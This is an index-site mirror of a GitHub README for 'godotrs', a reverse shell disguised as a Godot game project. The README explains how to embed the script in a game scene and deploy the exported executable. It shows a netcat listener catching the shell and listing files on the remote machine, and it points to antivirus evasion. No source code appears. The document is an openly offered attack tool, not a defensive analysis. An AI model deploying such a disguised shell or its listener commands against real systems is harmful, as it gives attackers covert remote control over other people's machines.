Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/potato-industries/godotrs

portable godot based reverse shell
https://github.com/potato-industries/godotrs

gdscript godot godot-game-engine reverse-shell

Last synced: about 7 hours ago
JSON representation

portable godot based reverse shell

Awesome Lists containing this project

README

        

# godotrs

portable godot (GDScript) based reverse shell

https://godotengine.org/download/

https://docs.godotengine.org/en/3.1/getting_started/scripting/index.html

**Supports**
- GDScript (godot)
- C# (+Mono)

**Usage**

Create project, add script to main scene or trigger scene.

deploy & run:
- godotrs.exe
- godotrs.pck

```
root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
192.168.1.71: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.71] 58913
ls -lha
>[total 107664
drwxr-xr-x 14 WOPR staff 448B Dec 17 09:15 .
drwxr-xr-x@ 5 WOPR staff 160B Dec 17 06:59 ..
drwxr-xr-x 4 WOPR staff 128B Dec 17 06:59 .import
-rw-r--r-- 1 WOPR staff 500B Dec 17 08:47 Popup.gd
-rw-r--r-- 1 WOPR staff 191B Dec 17 09:15 Popup.tscn
-rw-r--r-- 1 WOPR staff 163B Dec 17 09:15 default_env.tres
-rw-r--r-- 1 WOPR staff 774B Dec 17 09:12 export_presets.cfg
-rw-r--r-- 1 WOPR staff 9.6M Dec 17 09:06 godotrs.appx
-rw-r--r--@ 1 WOPR staff 15M Dec 17 09:02 godotrs.dmg
-rw-r--r-- 1 WOPR staff 27M Dec 17 09:12 godotrs.exe
-rw-r--r-- 1 WOPR staff 18K Dec 17 09:12 godotrs.pck
-rw-r--r--@ 1 WOPR staff 7.4K Dec 17 06:59 icon.png
-rw-r--r-- 1 WOPR staff 640B Dec 17 06:59 icon.png.import
-rw-r--r--@ 1 WOPR staff 736B Dec 17 09:15 project.godot
```

**CLI**

It's possible to execute GDScripts directly from a Godot installation if it's available on the system.

https://docs.godotengine.org/en/3.1/getting_started/editor/command_line_tutorial.html

```
user@host:~/newgame$ godot -s sayhello.gd
```

**AV**

Screenshot 2019-12-17 at 09 13 29

**Limitations**
- OpenGL 2.1 / OpenGL ES 2.0 compatible hardware to execute